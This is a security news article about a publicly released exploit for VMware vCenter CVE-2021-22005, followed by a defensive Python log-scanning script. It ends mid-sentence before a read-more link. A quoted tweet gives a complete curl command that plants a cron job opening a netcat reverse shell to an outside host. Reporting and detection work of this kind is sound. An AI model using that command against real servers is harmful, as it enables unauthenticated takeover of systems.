A Working Exploit for the CVE-2021-22005 Flaw in VMware vCenter Was Publicly Released

A working exploit for the Remote Code Execution (RCE) vulnerability in vCenter tracked as CVE-2021-22005 has been publicly released. According to security experts, the bug is already being exploited by hackers.

A Different Exploit

The exploit, released this week by a security expert at Rapid7, differs from the PoC exploit that began to circulate last week. This version can be used to open a reverse shell on an exposed server, enabling a threat actor to execute arbitrary code.

According to experts, the RCE enables an unauthenticated, remote attacker to upload files to the vCenter Server analytics service.

Complete Exploit in Reserve

The Rapid7 expert said in a tweet that the PoC exploit for CVE-2021-22005 works against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled.

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv “https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM” -H Content-Type: -d “* * * * * root nc -e /bin/sh 172.16.57.1 4444” https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

— wvu (@wvuuuuuuuuuuuuu) September 27, 2021

This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.
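For defenders reviewing proxy or web access logs, the request shape in the tweet above can be hunted for directly: a request to the analytics `hyper/send` endpoint whose `_i` parameter contains path characters. The following is an added example, not code from the article or from Rapid7; the log line format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/analytics/telemetry/ph/api/hyper/send"  # path from the PoC above
REQUEST_RE = re.compile(  # assumed combined-style access log line
    r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges), not real vCenter logs.
SAMPLE = [
    '198.51.100.7 - - [27/Sep/2021:10:00:01 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/12345 HTTP/1.1" 201 0',
    '198.51.100.9 - - [27/Sep/2021:10:02:13 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=x&_i=%252e%252e%252f%252e%252e%252ftmp%252fa HTTP/1.1" 201 0',
    '192.0.2.10 - - [27/Sep/2021:10:03:40 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=example&_i=instance01 HTTP/1.1" 201 0',
    '192.0.2.11 - - [27/Sep/2021:10:04:02 +0000] "GET /ui/ HTTP/1.1" 200 512',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded traversal is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_in_i_param(target):
    """Return the decoded _i value if it carries path characters, else None."""
    parts = urlsplit(target)
    if fully_decode(parts.path).rstrip("/") != ENDPOINT:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("_i", []):
        value = fully_decode(raw)
        if ".." in value or "/" in value or "\\" in value:
            return value
    return None

def scan(lines):
    """Collect source address, status and decoded _i for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        value = traversal_in_i_param(m.group("target")) if m else None
        if value is not None:
            hits.append({"src": m.group("src"), "status": int(m.group("status")), "_i": value})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any hit warrants checking the server for unexpected files in the directory named by the decoded `_i` value, since the flaw is a file upload.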

Source

As mentioned by BleepingComputer, the

Read More: https://heimdalsecurity.com/blog/a-working-exploit-for-the-cve-2021-22005-flaw-in-vmware-vcenter-was-publicly-released/